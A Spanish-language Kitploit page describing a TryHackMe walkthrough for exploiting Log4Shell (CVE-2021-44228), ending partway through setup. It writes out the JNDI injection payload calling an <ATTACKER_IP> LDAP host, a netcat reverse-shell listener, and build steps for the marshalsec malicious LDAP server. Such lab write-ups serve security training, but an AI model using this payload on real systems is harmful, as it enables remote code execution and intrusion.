¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!
solar-exploiting-log4j — Este repositorio proporciona una guía detallada de la sala *Solar Exploiting Log4j* en TryHackMe, centrada en explotar la vulnerabilidad crítica Log4Shell (CVE-2021-44228). El proyecto demuestra cómo los atacantes pueden aprovechar mecanismos de registro inseguros en aplicaciones Java para lograr la ejecución remota de código. | Kitploit
Este repositorio proporciona una guía detallada de la sala *Solar Exploiting Log4j* en TryHackMe, centrada en explotar la vulnerabilidad crítica Log4Shell (CVE-2021-44228). El proyecto demuestra cómo los atacantes pueden aprovechar mecanismos de registro inseguros en aplicaciones Java para lograr la ejecución remota de código.
Compartir
🔥 Solar Exploiting Log4j - Walkthrough de TryHackMe
📌 Sala: Solar Exploiting Log4j
Plataforma: TryHackMe
Dificultad: Media
Tema: Log4Shell (Vulnerabilidad Log4j)
🧠 Objetivo
Explota la vulnerabilidad Log4j (CVE-2021-44228) para obtener ejecución remota de código y capturar flags.
🛠️ Herramientas Utilizadas
Nmap
Burp Suite
cURL
Netcat
Python HTTP Server
🌐 Paso 1: Reconocimiento
🔍 Escanear el Objetivo
root@kitploit:~
nmap -sC -sV <TARGET_IP>
📌 Hallazgos
Puertos abiertos: 80 (HTTP), otros dependiendo de la sala
Aplicación web con backend basado en Java
🌐 Paso 2: Enumeración Web
Visita la aplicación web en el navegador
Interactúa con los campos de entrada (login/búsqueda/cabeceras)
Captura la petición con Burp Suite
💥 Paso 3: Identificar la Vulnerabilidad Log4j
La vulnerabilidad Log4j permite la inyección JNDI:
root@kitploit:~
${jndi:ldap://<ATTACKER_IP>:1389/a}
Si la entrada se registra → la vulnerabilidad existe.
⚙️ Paso 4: Configurar el Listener
Iniciar Netcat
root@kitploit:~
nc -lvnp 4444
Iniciar Servidor LDAP Malicioso (Ejemplo)
root@kitploit:~
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package